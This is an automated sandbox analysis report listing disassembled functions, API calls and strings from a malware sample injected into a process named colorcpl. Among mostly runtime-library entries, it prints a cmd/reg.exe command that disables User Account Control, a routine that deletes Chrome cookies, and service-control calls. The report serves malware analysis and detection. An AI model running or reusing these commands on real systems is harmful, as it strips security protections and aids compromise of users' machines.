                                                              • _free.LIBCMT ref: 030DE133
                                                              • _free.LIBCMT ref: 030DE13E
                                                              • _free.LIBCMT ref: 030DE192
                                                              • _free.LIBCMT ref: 030DE19D
                                                              • _free.LIBCMT ref: 030DE1A8
                                                              • _free.LIBCMT ref: 030DE1B3
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                                              • Instruction ID: 2ac624c1234a83ec874fa7776150fdcc26c8b8e6f154f60abf4d9830558815d6
                                                              • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                                              • Instruction Fuzzy Hash: 48113379642B08BAD920FBF0CC49FCB7BDCAF94700F408C25A29DAE450DA75B6048B55
                                                              Function 030C80FA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,030C80F1,030C705E), ref: 030C8108
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 030C8116
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 030C812F
                                                              • SetLastError.KERNEL32(00000000,?,030C80F1,030C705E), ref: 030C8181
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 4dd06d4f1cedc80b2c76c3b7a6153345904fd60329354dcec9da1794898d9079
                                                              • Instruction ID: 9d6bbc672e3380e16df20876249cb2d7a28df90b2b6accf7678ad039e087085d
                                                              • Opcode Fuzzy Hash: 4dd06d4f1cedc80b2c76c3b7a6153345904fd60329354dcec9da1794898d9079
                                                              • Instruction Fuzzy Hash: 4001283622F7555FD664BB7CBC84A9F2ACDEB41774728832DF814485E1EF278840810C
                                                              Function 0309A9E2 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0309AA1E
                                                              • GetLastError.KERNEL32 ref: 0309AA28
                                                              Strings
                                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0309A9E9
                                                              • [Chrome Cookies found, cleared!], xrefs: 0309AA4E
                                                              • UserProfile, xrefs: 0309A9EE
                                                              • [Chrome Cookies not found], xrefs: 0309AA42
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteErrorFileLast
                                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                              • API String ID: 2018770650-304995407
                                                              • Opcode ID: bef55abd888bc6bae0be906807093245a1395bdd5d8c0c7f884ddfc48b410c1f
                                                              • Instruction ID: 22eff73bc3768cdb3603d488551e9aa5ec229af2507ad152e0409b512188b64c
                                                              • Opcode Fuzzy Hash: bef55abd888bc6bae0be906807093245a1395bdd5d8c0c7f884ddfc48b410c1f
                                                              • Instruction Fuzzy Hash: 37012635B8720C6FEF44FAB8ED278EE7728A9E1410B40455BE4135F291FE129505A691
                                                              Function 030C887C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __allrem.LIBCMT ref: 030C8A09
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 030C8A25
                                                              • __allrem.LIBCMT ref: 030C8A3C
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 030C8A5A
                                                              • __allrem.LIBCMT ref: 030C8A71
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 030C8A8F
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 1992179935-0
                                                              • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                                              • Instruction ID: 1e724157238f17e67143643cda1f63032c0c510f0910638d1e388b6ad981b773
                                                              • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                                              • Instruction Fuzzy Hash: 92812D76A127865FE724DB79CC40BAFB3E9EF81320F18852EE551DB680E770D5048798
                                                              Function 030D2E0B Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __cftoe
                                                              • String ID:
                                                              • API String ID: 4189289331-0
                                                              • Opcode ID: b5c7bae8113a7b20c81906a4812d82e146e9f88f71b83b6d15af0822990d48d8
                                                              • Instruction ID: 9740974809ae85f853e1844dac808ffb21c3b85165c30a3e273c7a092e215f26
                                                              • Opcode Fuzzy Hash: b5c7bae8113a7b20c81906a4812d82e146e9f88f71b83b6d15af0822990d48d8
                                                              • Instruction Fuzzy Hash: F5510936902305ABDB65DB68CD44FEEB7EDEF8D320F184E69F8149A181EB31C5408A64
                                                              Function 030D4A81 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __freea$__alloca_probe_16_free
                                                              • String ID: a/p$am/pm
                                                              • API String ID: 2936374016-3206640213
                                                              • Opcode ID: c11e6c5083a8a8f99e83038d3739c62dd77a7e68f7287936852f06400b4bd9a4
                                                              • Instruction ID: 33bcad90cf5961c3166df9039edd6452cb57fe4d04f14d09cd4a2fa3b98b5c55
                                                              • Opcode Fuzzy Hash: c11e6c5083a8a8f99e83038d3739c62dd77a7e68f7287936852f06400b4bd9a4
                                                              • Instruction Fuzzy Hash: 9CD1F031902306EACBA8CF6AC895BFEB7F1FF05310F1D455AE905AB294DB759980CB50
                                                              Function 0309F8B7 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0309F8C4
                                                              • int.LIBCPMT ref: 0309F8D7
                                                                • Part of subcall function 0309CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0309CAFA
                                                                • Part of subcall function 0309CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0309CB14
                                                              • std::_Facet_Register.LIBCPMT ref: 0309F917
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0309F920
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0309F93E
                                                              • __Init_thread_footer.LIBCMT ref: 0309F97F
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                              • String ID:
                                                              • API String ID: 3815856325-0
                                                              • Opcode ID: eb63a02fc8ec0c65f6c14a7b6929dbd3a96089f7ecd424f5bf43381294bdf837
                                                              • Instruction ID: fdb8e16a7eca910b236fd8e672b2edd0b8a6b73192024de05d4b63cc041dfac6
                                                              • Opcode Fuzzy Hash: eb63a02fc8ec0c65f6c14a7b6929dbd3a96089f7ecd424f5bf43381294bdf837
                                                              • Instruction Fuzzy Hash: 7421073A912205EBDE14FBA8D5048DDB7AC9F89224B20059BE911EF290DF709E4197D0
                                                              Function 030D5725 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,030C8595,?,?,?,030C8C17,030C988A,?,03101E78), ref: 030D5729
                                                              • _free.LIBCMT ref: 030D575C
                                                              • _free.LIBCMT ref: 030D5784
                                                              • SetLastError.KERNEL32(00000000,?,03101E78,?,?,?,?,?,?,?,?,?,030C988A,00000000,030A52D9,00000000), ref: 030D5791
                                                              • SetLastError.KERNEL32(00000000,?,03101E78,?,?,?,?,?,?,?,?,?,030C988A,00000000,030A52D9,00000000), ref: 030D579D
                                                              • _abort.LIBCMT ref: 030D57A3
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID:
                                                              • API String ID: 3160817290-0
                                                              • Opcode ID: d12686e41b112e3702be209c5dda1d1b6bfcabd7472262c42fac7bfadf88380c
                                                              • Instruction ID: 16693f63ab84e386edcc1afdddfaf16610bf718a2c6e22c3115d09b0dc16f061
                                                              • Opcode Fuzzy Hash: d12686e41b112e3702be209c5dda1d1b6bfcabd7472262c42fac7bfadf88380c
                                                              • Instruction Fuzzy Hash: 6FF02D3D243711ABC252F6387C48BAF2ADD9BC3661F390054FD19DE144EF2584018E31
                                                              Function 030A8B60 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,030A8559,00000000), ref: 030A8B6F
                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,030A8559,00000000), ref: 030A8B83
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A8559,00000000), ref: 030A8B90
                                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,030A8559,00000000), ref: 030A8B9F
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A8559,00000000), ref: 030A8BB1
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A8559,00000000), ref: 030A8BB4
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                              • String ID:
                                                              • API String ID: 221034970-0
                                                              • Opcode ID: 1adba0bfe8819273286f3291fce56262ae97b57da26c7b7f38a9f9c743779ecd
                                                              • Instruction ID: be81b35fcf281cc9446be6ff24319666f96ca545c965d95197012536d71ca92f
                                                              • Opcode Fuzzy Hash: 1adba0bfe8819273286f3291fce56262ae97b57da26c7b7f38a9f9c743779ecd
                                                              • Instruction Fuzzy Hash: 5DF0C27164322C6FE610FAA4BC49EBF3BACDB96A62B000056FA099A140DB298D0595A0
                                                              Function 030A8BC7 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,030A84D9,00000000), ref: 030A8BD6
                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,030A84D9,00000000), ref: 030A8BEA
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A84D9,00000000), ref: 030A8BF7
                                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,030A84D9,00000000), ref: 030A8C06
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A84D9,00000000), ref: 030A8C18
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A84D9,00000000), ref: 030A8C1B
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                              • String ID:
                                                              • API String ID: 221034970-0
                                                              • Opcode ID: 921cf6a5252528673eab2984187d610012930ed01bfa5c61d1da1d5ce0689899
                                                              • Instruction ID: 06487fa8c54d56339521bf385032abdf2ae41092f0231f6ff9a158864305c4c5
                                                              • Opcode Fuzzy Hash: 921cf6a5252528673eab2984187d610012930ed01bfa5c61d1da1d5ce0689899
                                                              • Instruction Fuzzy Hash: 88F0C27164322C6FE611FB68BC49EBF3FACDB85A61B000056FA099A144DF298D0599A0
                                                              Function 030A8A5C Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,030A85D9,00000000), ref: 030A8A6B
                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,030A85D9,00000000), ref: 030A8A7F
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A85D9,00000000), ref: 030A8A8C
                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,030A85D9,00000000), ref: 030A8A9B
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A85D9,00000000), ref: 030A8AAD
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A85D9,00000000), ref: 030A8AB0
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                              • String ID:
                                                              • API String ID: 221034970-0
                                                              • Opcode ID: c07270d58c0b9d10c8c8891556c6fabbaa1322a31ed5ff1ae82707b0e001c982
                                                              • Instruction ID: 4394f175489d114bf2127120a92f473f0710e0df39ca6b1de769cd1f7f1b2baf
                                                              • Opcode Fuzzy Hash: c07270d58c0b9d10c8c8891556c6fabbaa1322a31ed5ff1ae82707b0e001c982
                                                              • Instruction Fuzzy Hash: E1F0C23164322C6FE610FAA4BC49EBF3BACDB95A62F000056F9098A141DB298D4595E0
                                                              Function 030AB2C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegisterClassExA.USER32(00000030), ref: 030AB310
                                                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 030AB32B
                                                              • GetLastError.KERNEL32 ref: 030AB335
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ClassCreateErrorLastRegisterWindow
                                                              • String ID: 0$MsgWindowClass
                                                              • API String ID: 2877667751-2410386613
                                                              • Opcode ID: 0e3882353627e1e0f7eb399730f985deb860ad2cb3f5f7241ce24bf4e79bbf4b
                                                              • Instruction ID: 2b50f196c1c6194ce3320c8ed8d509db84d5ca8dda2ef896ee80bee0d476c7e8
                                                              • Opcode Fuzzy Hash: 0e3882353627e1e0f7eb399730f985deb860ad2cb3f5f7241ce24bf4e79bbf4b
                                                              • Instruction Fuzzy Hash: 55015EB2D0121CAFDB10DFE5ECC49EFBBBCFB04254F40052AF910A6240E77549048BA0
                                                              Function 0309E501 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,03101FFC), ref: 0309E547
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,03101FFC), ref: 0309E556
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,03101FFC), ref: 0309E55B
                                                              Strings
                                                              • C:\Windows\System32\cmd.exe, xrefs: 0309E542
                                                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0309E53D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandle$CreateProcess
                                                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                              • API String ID: 2922976086-4183131282
                                                              • Opcode ID: 3b3a826143a8d89ef10c8c51f4872d74a069067c9615c70075ec7f133bf9dcf4
                                                              • Instruction ID: b07bb6978ab5a4ddff8e5ace944a20e297fbac4e2ee6862fbabfa8e910ddbc60
                                                              • Opcode Fuzzy Hash: 3b3a826143a8d89ef10c8c51f4872d74a069067c9615c70075ec7f133bf9dcf4
                                                              • Instruction Fuzzy Hash: 45F06276E0129C7ACB20EAD7AC0DEDF7F3CEBC5B10F00001ABA14AA014D5756400CAB0
                                                              Function 030D083A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,030D07EB,?,?,030D078B,?,030FB4F8,0000000C,030D08E2,?,00000002), ref: 030D085A
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 030D086D
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,030D07EB,?,?,030D078B,?,030FB4F8,0000000C,030D08E2,?,00000002,00000000), ref: 030D0890
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 889affaebbbee54f9e191c4be089816e4684ed7e38999941c115ddcc30742717
                                                              • Instruction ID: 395a2edf1142dff80272d1b49fa6c853120bd50f5116e7e47b74a05bc470952e
                                                              • Opcode Fuzzy Hash: 889affaebbbee54f9e191c4be089816e4684ed7e38999941c115ddcc30742717
                                                              • Instruction Fuzzy Hash: 40F04431B0221CBFCB15EFA4E849BAEBFF4DF14651F444169F809AA150DB359A40CA90
                                                              Function 030950C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,03101E90,03094E5A,00000001,?,00000000,03101E90,03094C88,00000000,?,?,?), ref: 03095100
                                                              • SetEvent.KERNEL32(?,?,00000000,03101E90,03094C88,00000000,?,?,?), ref: 0309510C
                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,03101E90,03094C88,00000000,?,?,?), ref: 03095117
                                                              • CloseHandle.KERNEL32(?,?,00000000,03101E90,03094C88,00000000,?,?,?), ref: 03095120
                                                                • Part of subcall function 030A94DA: GetLocalTime.KERNEL32(00000000), ref: 030A94F4
                                                              Strings
                                                              • Connection KeepAlive | Disabled, xrefs: 030950D9
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                              • String ID: Connection KeepAlive | Disabled
                                                              • API String ID: 2993684571-3818284553
                                                              • Opcode ID: 4c3e969a111a3911c4a610e2cdf9fa3f25ea457eeeb10e96bbc205254d9ca7aa
                                                              • Instruction ID: e0bf678a101250c48ab48995a83e4181822111c3541fb8eb63a286041758a7fa
                                                              • Opcode Fuzzy Hash: 4c3e969a111a3911c4a610e2cdf9fa3f25ea457eeeb10e96bbc205254d9ca7aa
                                                              • Instruction Fuzzy Hash: 4EF02B75A027047FFF11B7749C0996E7F9CAB53620F000D0EF8924A661C5699440D751
                                                              Function 030A8D76 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 030A94DA: GetLocalTime.KERNEL32(00000000), ref: 030A94F4
                                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 030A8DA8
                                                              • PlaySoundW.WINMM(00000000,00000000), ref: 030A8DB6
                                                              • Sleep.KERNEL32(00002710), ref: 030A8DBD
                                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 030A8DC6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                                              • String ID: Alarm triggered
                                                              • API String ID: 614609389-2816303416
                                                              • Opcode ID: 754f623124fa944fdbca557e3d6e99e57a099e59aa007c455f8b5ed5910064e5
                                                              • Instruction ID: 0e5426dfa56dfebeeb0dbc4edda121dda0454f6ace02fb2eda743118b3fa4e0e
                                                              • Opcode Fuzzy Hash: 754f623124fa944fdbca557e3d6e99e57a099e59aa007c455f8b5ed5910064e5
                                                              • Instruction Fuzzy Hash: 91E0122AB422583BE51473AA7D0FC6F2E2DDAD3A61701045EFA045F545DA55180186F2
                                                              Function 030CBB4A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3415ee55ed9505d1b3ab9b48190d5b8b33a73f9ef81cd93975c4e08b8992d4e4
                                                              • Instruction ID: 313f421c8dc53630d11e1b6d82759516785a3ed36ea63e41c4bcbebd91134f16
                                                              • Opcode Fuzzy Hash: 3415ee55ed9505d1b3ab9b48190d5b8b33a73f9ef81cd93975c4e08b8992d4e4
                                                              • Instruction Fuzzy Hash: 9B71F631D22296DBCB61DF94C8956FFFBB9EF41310F18066DE8116B180EB718941CBA1
                                                              Function 030D220D Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 030D3649: RtlAllocateHeap.NTDLL(00000000,030C3069,?,?,030C65E7,?,?,?,?,?,0309C88A,030C3069,?,?,?,?), ref: 030D367B
                                                              • _free.LIBCMT ref: 030D2318
                                                              • _free.LIBCMT ref: 030D232F
                                                              • _free.LIBCMT ref: 030D234E
                                                              • _free.LIBCMT ref: 030D2369
                                                              • _free.LIBCMT ref: 030D2380
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 3033488037-0
                                                              • Opcode ID: ee7281218bfeeb36143bd6dc934d9bd55be6553ea3d51147a5aac5d778c19fc2
                                                              • Instruction ID: f0285101ac5ba42a3c0a95912e88aabf5738fa876d7dfeee53ed6aa6f3de965f
                                                              • Opcode Fuzzy Hash: ee7281218bfeeb36143bd6dc934d9bd55be6553ea3d51147a5aac5d778c19fc2
                                                              • Instruction Fuzzy Hash: A951C576A02708AFDB61DF69CC41BAAB7F8EF49720F144999E809DB650E731E901CB50
                                                              Function 030D6894 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,030EC1E4), ref: 030D68FE
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,030FF754,000000FF,00000000,0000003F,00000000,?,?), ref: 030D6976
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,030FF7A8,000000FF,?,0000003F,00000000,?), ref: 030D69A3
                                                              • _free.LIBCMT ref: 030D68EC
                                                                • Part of subcall function 030D3C92: RtlFreeHeap.NTDLL(00000000,00000000,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?), ref: 030D3CA8
